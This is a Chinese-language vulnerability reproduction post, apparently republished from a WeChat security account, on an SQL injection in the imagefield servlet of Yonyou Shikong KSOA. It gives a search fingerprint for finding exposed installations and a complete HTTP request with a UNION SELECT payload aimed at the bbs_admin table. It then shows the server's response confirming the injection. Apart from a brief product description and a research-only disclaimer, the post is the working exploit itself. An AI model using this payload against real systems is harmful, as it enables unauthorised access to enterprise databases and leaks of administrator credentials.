漏洞介绍
用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。该平台imagefield接口处存在SQL注入漏洞,会导致数据泄露。
资产收集
app
=
"用友-时空KSOA"
漏洞复现
构造请求包
GET
/servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-1'+union+select+sys.fn_varbintohexstr(hashbytes('md5','test'))--+
HTTP/1.1
Host
:
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection
: close
Accept
: */*
Accept-Language
: en
Accept-Encoding
: gzip
返回包
HTTP/1.1
200
OK
Server
: Apache-Coyote/1.1
Set-Cookie
: JSESSIONID=D26AEC202CC33465C65CA569B5BF3EA4; Path=/
Content-Type
: image/jpeg
Date
: Tue, 27 Feb 2024 02:08:14 GMT
Connection
: close
Content-Length
: 34
0x098f6bcd4621d373cade4e832627b4f6
证明存在漏洞
原文始发于微信公众号(Devil安全):【漏洞复现】用友-时空KSOA SQL注入漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论